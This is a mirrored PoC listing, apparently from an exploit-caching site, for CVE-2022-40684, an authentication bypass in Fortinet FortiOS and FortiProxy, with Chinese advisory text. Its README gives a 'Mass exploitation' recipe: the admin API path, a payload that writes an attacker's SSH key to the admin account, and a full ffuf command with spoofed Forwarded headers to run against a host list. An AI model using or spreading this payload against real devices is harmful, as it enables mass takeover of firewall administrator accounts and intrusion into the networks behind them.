CVE-2022-40684 PoC — Fortinet FortiOS 授权问题漏洞

Source

https://github.com/kljunowsky/CVE-2022-40684-POC

Associated Vulnerability

Title:Fortinet FortiOS 授权问题漏洞 (CVE-2022-40684)
Description:Fortinet FortiOS是美国飞塔（Fortinet）公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。 Fortinet FortiOS存在授权问题漏洞。目前尚无此漏洞的相关信息，请随时关注CNNVD或厂商公告。

Description

Exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager

Readme

# CVE-2022-40684-POC
FortiProxy / FortiOS Authentication bypass

## Mass exploitation

```/api/v2/cmdb/system/admin/<username>```


```{"ssh-public-key1": "<your-id_rsa.pub>"}```

```
ffuf -c -w hosts.txt -u FUZZ/api/v2/cmdb/system/admin/admin -X PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[127.0.0.1
]:8000";by=”[127.0.0.1]:9000";' -d '{"ssh-public-key1": "kljunowsky"}' -mr "SSH" -r
```

Happy hunting!

### Requirements
[ffuf](https://github.com/ffuf/ffuf)
Thanks [@joohoi](https://github.com/joohoi)!

[Twitter](https://twitter.com/milanshiftsec)

[LinkedIn](https://www.linkedin.com/in/milan-jovic-sec/)

File Snapshot


 [4.0K]  /data/pocs/6cca192455637073dbf4baf9710c3bbc49aee6a4
├── [1.2K]  CVE-2022-40684.py
├── [1.0K]  LICENSE
└── [ 659]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!